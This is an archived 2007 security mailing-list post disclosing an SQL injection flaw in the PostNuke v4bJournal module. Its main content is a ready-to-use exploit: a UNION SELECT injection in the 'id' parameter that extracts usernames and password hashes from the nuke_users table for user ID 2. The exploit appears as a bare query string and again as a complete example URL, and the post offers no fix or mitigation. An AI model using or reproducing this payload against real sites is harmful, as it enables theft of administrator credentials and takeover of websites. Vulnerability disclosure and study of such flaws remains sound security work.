Post Nuke v4bJournal Module Sql Inject
- From: abbasi@xxxxxxxxxxx
- Date: 2 May 2007 17:59:34 -0000
----------------------------------------
PostNuke Journal
----------------------------------------
DISCOVERED BY :Ali Abbasi
Olom Fonon Mazandaran University - Security Research Center, Babol, Iran
Greetz For All Y! UnderGround Group Members ( www.2600.ir )
Greetz For All Persian Bugtraq Members ( www.bugtraq.ir )
Contact: abbasi@xxxxxxxxxxx
{SQL BUG}
in
index.php?module=v4bJournal&func=journal_comment&id=(SQL)
------------------------------------------
EXPLIOT BY :ABDUCTER
Greetz For ABDUCTER Real Friend Nanos (Nancy)
Contact: ABDUCTER_MINDS@xxxxxxxxx
index.php?module=v4bJournal&func=journal_comment&id=-1/**/union/**/select/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,14/**/from/**/nuke_users/**/where/**/pn_uid=2/*
EX:-
http://www.example.com/index.php?module=v4bJournal&func=journal_comment&id=-1/**/union/**/select/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,14/**/from/**/nuke_users/**/where/**/pn_uid=2/*
U must regrister first ( You Most Have An Account On Vulnerable Site )
-------------------------------------------
- Prev by Date: Cisco Security Advisory: LDAP and VPN Vulnerabilities in PIX and ASA Appliances
- Next by Date: iDefense Security Advisory 05.02.07: LiveData Protocol Server Heap Overflow Vulnerability
- Previous by thread: Cisco Security Advisory: LDAP and VPN Vulnerabilities in PIX and ASA Appliances
- Next by thread: iDefense Security Advisory 05.02.07: LiveData Protocol Server Heap Overflow Vulnerability
- Index(es):
